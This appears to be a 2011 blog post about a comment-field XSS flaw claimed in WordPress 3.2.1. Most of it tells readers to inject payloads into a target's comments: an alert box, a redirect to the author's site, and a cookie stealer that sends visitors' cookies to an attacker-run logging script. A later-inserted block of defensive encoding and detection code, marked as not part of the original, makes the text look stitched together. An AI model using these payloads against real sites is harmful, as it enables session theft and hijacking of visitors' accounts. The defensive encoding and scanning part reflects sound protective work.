Saturday, August 20, 2011
XSS Injection Vulnerability in WordPress 3.2.1
Bad news for just about every WordPress blogger out there: thousands of WordPress 3.2.1 installations are at risk of being compromised. The latest version of WordPress, 3.2.1, an extremely popular suite of tools for powering blogs, has been found to be vulnerable to an XSS injection attack that lets users inject malicious JavaScript because the comments field is not sanitized. Without discussing much about what this vulnerability could do to your blog, I will jump to how it works and the solution.
How does it work?
Inject one of the codes below into the comment field of the target, or use your brain to make a more powerful injection.
Popup “alert” Box
<script>alert('www.cybertricks.co.cc')</script>
Redirect to www.cybertricks.co.cc
<script>document.location="http://cybertricks.co.cc"</script>
Cookie Stealer (needs a logging system in place)
<script>document.location="http://your-domain/your stealer.php?cookie=" + document.cookie;document.location="http://the-site-you-are-stealing-from.com"</script>
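The post names the root cause (the comments field is not sanitized) but never shows the fix. The following is an added example, not code from the original post and not WordPress's own code, showing the defender side: output-encode untrusted comment text before it is rendered so the payloads above appear as literal text, and a simple scan (the escapeHtml, containsActiveContent, flagComments and renderComment names are assumptions for this example) that flags stored comments still carrying executable markup. The sample comments are constructed from the payloads shown above.

```javascript
// Added example (not WordPress code): neutralise the comment-field XSS shown above
// by HTML-encoding every comment before it reaches the page.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")   // must come first so later entities are not double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Defender-side check: does a stored comment still contain something a browser would
// execute? Covers <script> tags, inline event handlers (onload=, onerror=) and
// javascript: URLs. This is a triage heuristic, not a substitute for encoding.
const ACTIVE_CONTENT = /<\s*script\b|\bon\w+\s*=|javascript\s*:/i;
function containsActiveContent(html) {
  return ACTIVE_CONTENT.test(html);
}

// Return the indices of comments in a list that look like injection attempts.
function flagComments(comments) {
  return comments
    .map((c, i) => (containsActiveContent(c) ? i : -1))
    .filter((i) => i !== -1);
}

// Render one comment the safe way: encoded text inside a fixed template.
function renderComment(raw) {
  return '<p class="comment">' + escapeHtml(raw) + "</p>";
}

// Constructed sample comments modelled on the payloads in the post above.
const SAMPLES = [
  "<script>alert('www.cybertricks.co.cc')</script>",
  '<script>document.location="http://cybertricks.co.cc"</script>',
  "Nice post, thanks!",
];

// Stand-alone run: show which raw comments are flagged and that the rendered form is inert.
for (const raw of SAMPLES) {
  console.log(containsActiveContent(raw), containsActiveContent(renderComment(raw)), renderComment(raw));
}
```

The encoded output is what the HTML renderer should receive; the scan over raw stored comments is what an incident responder would run against the comments table after a report like this one.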
This post was written by: Ashif Ismail
Ashif Ismail is a professional blogger, Software Programmer and front end web developer. Follow him on Twitter